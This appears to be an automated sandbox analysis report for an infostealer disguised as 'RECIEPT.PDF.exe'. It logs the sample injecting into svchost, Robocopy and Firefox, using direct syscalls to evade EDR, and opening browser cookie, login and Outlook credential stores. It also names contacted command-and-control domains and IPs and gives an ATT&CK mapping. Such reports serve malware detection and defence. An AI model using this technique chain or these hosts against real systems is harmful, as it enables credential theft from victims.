          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtQueryInformationProcess: Direct from: 0x77392C26Jump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtResumeThread: Direct from: 0x77392FBCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtWriteVirtualMemory: Direct from: 0x7739490CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtCreateUserProcess: Direct from: 0x7739371CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtAllocateVirtualMemory: Direct from: 0x77392BFCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtQuerySystemInformation: Direct from: 0x77392DFCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtReadFile: Direct from: 0x77392ADCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtDelayExecution: Direct from: 0x77392DDCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtClose: Direct from: 0x77387B2E
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtWriteVirtualMemory: Direct from: 0x77392E3CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtCreateMutant: Direct from: 0x773935CCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtResumeThread: Direct from: 0x773936ACJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtMapViewOfSection: Direct from: 0x77392D1CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtOpenKeyEx: Direct from: 0x77392B9CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtSetInformationProcess: Direct from: 0x77392C5CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtProtectVirtualMemory: Direct from: 0x77392F9CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtNotifyChangeKey: Direct from: 0x77393C2CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtQueryInformationToken: Direct from: 0x77392CACJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtCreateFile: Direct from: 0x77392FECJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtOpenFile: Direct from: 0x77392DCCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtTerminateThread: Direct from: 0x77392FCCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtDeviceIoControlFile: Direct from: 0x77392AECJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtAllocateVirtualMemory: Direct from: 0x77392BECJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtQuerySystemInformation: Direct from: 0x773948CCJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtQueryVolumeInformationFile: Direct from: 0x77392F2CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtAllocateVirtualMemory: Direct from: 0x773948ECJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtOpenSection: Direct from: 0x77392E0CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtAllocateVirtualMemory: Direct from: 0x77393C9CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtSetInformationThread: Direct from: 0x773863F9Jump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtClose: Direct from: 0x77392B6C
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtSetInformationThread: Direct from: 0x77392B4CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtReadVirtualMemory: Direct from: 0x77392E8CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtCreateKey: Direct from: 0x77392C6CJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeNtQueryAttributesFile: Direct from: 0x77392E6CJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\Robocopy.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeThread register set: target process: 3548Jump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeThread APC queued: target process: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FF7008Jump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RECIEPT.PDF.exe"Jump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
          Source: dgGgsACWgP.exe, 00000005.00000000.2587021922.0000000001521000.00000002.00000001.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000005.00000002.4783450482.0000000001521000.00000002.00000001.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747556376.0000000001A21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: RECIEPT.PDF.exe, dgGgsACWgP.exe, 00000005.00000000.2587021922.0000000001521000.00000002.00000001.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000005.00000002.4783450482.0000000001521000.00000002.00000001.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747556376.0000000001A21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: dgGgsACWgP.exe, 00000005.00000000.2587021922.0000000001521000.00000002.00000001.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000005.00000002.4783450482.0000000001521000.00000002.00000001.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747556376.0000000001A21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: dgGgsACWgP.exe, 00000005.00000000.2587021922.0000000001521000.00000002.00000001.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000005.00000002.4783450482.0000000001521000.00000002.00000001.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747556376.0000000001A21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: RECIEPT.PDF.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2672502009.0000000009340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2667751467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4792153711.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4779996297.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Source: RECIEPT.PDF.exeBinary or memory string: WIN_XP
          Source: RECIEPT.PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
          Source: RECIEPT.PDF.exeBinary or memory string: WIN_XPe
          Source: RECIEPT.PDF.exeBinary or memory string: WIN_VISTA
          Source: RECIEPT.PDF.exeBinary or memory string: WIN_7
          Source: RECIEPT.PDF.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2672502009.0000000009340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2667751467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4792153711.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4779996297.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          2
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          4
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter
          2
          Valid Accounts
          1
          Abuse Elevation Control Mechanism
          1
          Deobfuscate/Decode Files or Information
          21
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Email Collection
          4
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
          Valid Accounts
          13
          Obfuscated Files or Information
          NTDS16
          System Information Discovery
          Distributed Component Object Model21
          Input Capture
          4
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
          Access Token Manipulation
          1
          DLL Side-Loading
          LSA Secrets141
          Security Software Discovery
          SSH3
          Clipboard Data
          Fallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
          Process Injection
          1
          Masquerading
          Cached Domain Credentials3
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Valid Accounts
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
          Virtualization/Sandbox Evasion
          Proc Filesystem11
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
          Access Token Manipulation
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
          Process Injection
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515414 Sample: RECIEPT.PDF.exe Startdate: 22/09/2024 Architecture: WINDOWS Score: 100 28 www.yourhomecopilot.online 2->28 30 www.vpnboo.online 2->30 32 20 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 7 other signatures 2->48 10 RECIEPT.PDF.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 dgGgsACWgP.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 Robocopy.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 dgGgsACWgP.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.vpnboo.online 194.85.61.76, 49727, 49728, 49729 RU-CENTERRU Russian Federation 22->34 36 pakmartcentral.shop 84.32.84.32, 49719, 49720, 49721 NTT-LT-ASLT Lithuania 22->36 38 11 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          RECIEPT.PDF.exe42%ReversingLabsWin32.Trojan.ShellcodeCrypter
          RECIEPT.PDF.exe47%VirustotalBrowse
          RECIEPT.PDF.exe100%AviraHEUR/AGEN.1321671
          RECIEPT.PDF.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          webredir.vip.gandi.net0%VirustotalBrowse
          pakmartcentral.shop2%VirustotalBrowse
          aposentandolegal.com0%VirustotalBrowse
          94950.bodis.com0%VirustotalBrowse
          www.yourhomecopilot.online0%VirustotalBrowse
          www.nad5.shop0%VirustotalBrowse
          nng65.top0%VirustotalBrowse
          www.nng65.top1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
